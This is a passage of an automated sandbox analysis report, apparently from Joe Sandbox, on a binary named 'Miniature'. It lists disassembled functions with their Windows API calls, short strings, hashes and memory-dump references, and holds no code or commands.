                                                                                                                                                                                                                                                                                            • API String ID: 2889604237-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 5176559743a8a40e7d31e0f7be0e43fc81f83539d3c68d4b1f720f7c07761f08
                                                                                                                                                                                                                                                                                            • Instruction ID: 81bf34d8643601eb81b4421828884bbc55c60988982adb97fa7dc358aa9da2f2
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5176559743a8a40e7d31e0f7be0e43fc81f83539d3c68d4b1f720f7c07761f08
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8EE012B0C00204EFCB40AFA0D908B9DBBB1AB49315B108809F84BE3650CB386A02AF00
                                                                                                                                                                                                                                                                                            Function 00C857CC Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C141EA: _wcslen.LIBCMT ref: 00C141EF
                                                                                                                                                                                                                                                                                            • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00C85919
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Connection_wcslen
                                                                                                                                                                                                                                                                                            • String ID: *$LPT
                                                                                                                                                                                                                                                                                            • API String ID: 1725874428-3443410124
                                                                                                                                                                                                                                                                                            • Opcode ID: 56333b6f0a324e59b3370ad5482479aafa7237189b8fb6a63549675d1b4b15a2
                                                                                                                                                                                                                                                                                            • Instruction ID: e837f50a5497722944f5103bf549b85b18a232b66f3249cb8131df22380ebac1
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 56333b6f0a324e59b3370ad5482479aafa7237189b8fb6a63549675d1b4b15a2
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D3919F75A00604DFCB14EF54C4C4EAABBF1AF45318F188099E85A5F392C7B1EE86DB94
                                                                                                                                                                                                                                                                                            Function 00C3E5ED Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • __startOneArgErrorHandling.LIBCMT ref: 00C3E67D
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ErrorHandling__start
                                                                                                                                                                                                                                                                                            • String ID: pow
                                                                                                                                                                                                                                                                                            • API String ID: 3213639722-2276729525
                                                                                                                                                                                                                                                                                            • Opcode ID: 25588f7de343c838b53348785c86b73a8dda621e7a2c771aa40809074630be5d
                                                                                                                                                                                                                                                                                            • Instruction ID: 56db96b799242b02cf34ee3fbf5d7fe1bc4ae51f5bfd36f42bd4546aa2dd8f9d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 25588f7de343c838b53348785c86b73a8dda621e7a2c771aa40809074630be5d
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 40519E61E2810686CB117714CD423BE3BB4FB50750F304E5AF0B2422E8EF358F8AAB46
                                                                                                                                                                                                                                                                                            Function 00C2A8EC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID: #
                                                                                                                                                                                                                                                                                            • API String ID: 0-1885708031
                                                                                                                                                                                                                                                                                            • Opcode ID: c24e09fc4dc4d6d6dec10845927a6fd710eba21b0477fa0cb6ef25a8fb966aa5
                                                                                                                                                                                                                                                                                            • Instruction ID: e4e9ab13f49a6b55243fc25da29ee501ffc6fee5b526e96f580ca7a462ab93b9
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c24e09fc4dc4d6d6dec10845927a6fd710eba21b0477fa0cb6ef25a8fb966aa5
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C6514031504256DFCF25EF29D091AFE7BA0EF16310F24415AF8A29B290DF309E86DB61
                                                                                                                                                                                                                                                                                            Function 00C2F6CA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000), ref: 00C2F6DB
                                                                                                                                                                                                                                                                                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 00C2F6F4
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: GlobalMemorySleepStatus
                                                                                                                                                                                                                                                                                            • String ID: @
                                                                                                                                                                                                                                                                                            • API String ID: 2783356886-2766056989
                                                                                                                                                                                                                                                                                            • Opcode ID: 48f182dbdd587891fce8602b706d772d5e5e0d19e187b2dfcf53782f36ec7a79
                                                                                                                                                                                                                                                                                            • Instruction ID: fa60f42b78ac92bf773ecc15505d64ee8385e47e6eca1a7efde607ddbcb088ce
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 48f182dbdd587891fce8602b706d772d5e5e0d19e187b2dfcf53782f36ec7a79
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 995127718087489BD320AF10DC86BAFBBF8FF95304F81485DF599411A5DF308569EB66
                                                                                                                                                                                                                                                                                            Function 00C961A2 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: BuffCharUpper_wcslen
                                                                                                                                                                                                                                                                                            • String ID: CALLARGARRAY
                                                                                                                                                                                                                                                                                            • API String ID: 157775604-1150593374
                                                                                                                                                                                                                                                                                            • Opcode ID: 63d56d38b5961f5e5599e1950584ae5f051f7c9c3a917522674a1ba3d8ea3997
                                                                                                                                                                                                                                                                                            • Instruction ID: 0384d7ebfb149d7f2f578282082f910890d734559b9f4596a4b08c5c2fc95789
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 63d56d38b5961f5e5599e1950584ae5f051f7c9c3a917522674a1ba3d8ea3997
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F841E271E00619DFCF04EFA4C8999EEBBB5FF59364F104029E416AB291E7709E81DB90
                                                                                                                                                                                                                                                                                            Function 00C8DB39 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C8DB75
                                                                                                                                                                                                                                                                                            • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00C8DB7F
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CrackInternet_wcslen
                                                                                                                                                                                                                                                                                            • String ID: |
                                                                                                                                                                                                                                                                                            • API String ID: 596671847-2343686810
                                                                                                                                                                                                                                                                                            • Opcode ID: 1022c7cc6d3fb5da669a97f4968a0449f4282174389da4b38945f4b584904b85
                                                                                                                                                                                                                                                                                            • Instruction ID: 22b42fb75adaf2ed3313642ced7eb201a1d211fb3aab4e90ab9024966e80a94a
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1022c7cc6d3fb5da669a97f4968a0449f4282174389da4b38945f4b584904b85
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9A317E71C01119ABDF05EFA5CC85EEEBFB9FF05304F100029F815A61A6EB719A46EB50
                                                                                                                                                                                                                                                                                            Function 00CA4008 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?,?,?,?), ref: 00CA40BD
                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00CA40F8
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$DestroyMove
                                                                                                                                                                                                                                                                                            • String ID: static
                                                                                                                                                                                                                                                                                            • API String ID: 2139405536-2160076837
                                                                                                                                                                                                                                                                                            • Opcode ID: 27b800595141404e742fa66e43ee0e8a83f9c670c1ff997f93e91154d079fe41
                                                                                                                                                                                                                                                                                            • Instruction ID: 4e42c5def1651f2baf6d2bb8cb95164736ef949499f2b5735f19cb7aefe61cba
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 27b800595141404e742fa66e43ee0e8a83f9c670c1ff997f93e91154d079fe41
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E931A171100605AADB24DF78CC80FFB77A9FF89728F008619F9A6C7190DA71AC81E760
                                                                                                                                                                                                                                                                                            Function 00CA4FD5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00CA50BD
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00CA50D2
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                                                                                                            • String ID: '
                                                                                                                                                                                                                                                                                            • API String ID: 3850602802-1997036262
                                                                                                                                                                                                                                                                                            • Opcode ID: c7c8fa7cdd827bb8f87d3dbcd33439f17232cf624a3bc29fcc990a9b5da678fa
                                                                                                                                                                                                                                                                                            • Instruction ID: 904a144c2077c82084150a8ff655ad7f0d450d1674a12e1fad2756d747e4e1b3
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c7c8fa7cdd827bb8f87d3dbcd33439f17232cf624a3bc29fcc990a9b5da678fa
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CB313B74A0170AAFDB14CFA9C880BDE7BB5FF4A304F10806AE915AB351D771AA45CF90
                                                                                                                                                                                                                                                                                            Function 00CA41AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C17873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00C178B1
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C17873: GetStockObject.GDI32(00000011), ref: 00C178C5
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C17873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C178CF
                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00CA4216
                                                                                                                                                                                                                                                                                            • GetSysColor.USER32(00000012), ref: 00CA4230
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                                                                                                                                                            • String ID: static
                                                                                                                                                                                                                                                                                            • API String ID: 1983116058-2160076837
                                                                                                                                                                                                                                                                                            • Opcode ID: a1530f3faee0cc88db46e246f6c65081533d1f4455a563b76268acd883c9a0cf
                                                                                                                                                                                                                                                                                            • Instruction ID: a40a93beebe7f49f8fe8494bfc8cc5d8d5a8f5f5ed44cc7f54a21964ba197a21
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a1530f3faee0cc88db46e246f6c65081533d1f4455a563b76268acd883c9a0cf
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 541129B261020AAFDB00DFA8CC45BEE7BB8EB49318F014614F966E3150D674E8509B60
                                                                                                                                                                                                                                                                                            Function 00C8D763 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00C8D7C2
                                                                                                                                                                                                                                                                                            • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00C8D7EB
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Internet$OpenOption
                                                                                                                                                                                                                                                                                            • String ID: <local>
                                                                                                                                                                                                                                                                                            • API String ID: 942729171-4266983199
                                                                                                                                                                                                                                                                                            • Opcode ID: 23f04433e9f8bc4a911a0e1552d01b1033a6d60e3f70f3cc0a5b8c50e8ce878f
                                                                                                                                                                                                                                                                                            • Instruction ID: e6a030c3bdfb80e0de32c378c6463d628f2c6acc354095eb9e68e6a4a7dbf452
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 23f04433e9f8bc4a911a0e1552d01b1033a6d60e3f70f3cc0a5b8c50e8ce878f
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5111E071201232BAD7385A628C49FE7BF9CEB127ACF00422AB51A831C4D2649940C3F4
                                                                                                                                                                                                                                                                                            Function 00C775ED Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1B329: _wcslen.LIBCMT ref: 00C1B333
                                                                                                                                                                                                                                                                                            • CharUpperBuffW.USER32(?,?,?), ref: 00C7761D
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C77629
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                                                                                                                            • String ID: STOP
                                                                                                                                                                                                                                                                                            • API String ID: 1256254125-2411985666
                                                                                                                                                                                                                                                                                            • Opcode ID: 0493b5c55d57c6137ffbe511ba6a3a66803ef7acbd41d7211968fd660f97466e
                                                                                                                                                                                                                                                                                            • Instruction ID: a9520f090bed0d7deb0215ff1498c91fceee75cddf50a9922dee9ad2310d3178
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0493b5c55d57c6137ffbe511ba6a3a66803ef7acbd41d7211968fd660f97466e
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3801C432614A2A8BCB10AEBDDC409BF73B5AB617507404A24F439D3299EB35DE40E690
                                                                                                                                                                                                                                                                                            Function 00C7262B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1B329: _wcslen.LIBCMT ref: 00C1B333
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C745FD: GetClassNameW.USER32(?,?,000000FF), ref: 00C74620
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00C72699
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                            • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                                            • Opcode ID: c49adc963d5187205e9baf1a72b76fdfbae8aac07f028c73ab2de4663dcf7590
                                                                                                                                                                                                                                                                                            • Instruction ID: 86a1d219c923078a54141ab2ebb26b570f0ab6f09de73b47e41cc7236f651800
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c49adc963d5187205e9baf1a72b76fdfbae8aac07f028c73ab2de4663dcf7590
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7C01D475640214ABCB08EBA4CC51DFE7778FF46350B40461BF876973D5DB315909EA50
                                                                                                                                                                                                                                                                                            Function 00C72525 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
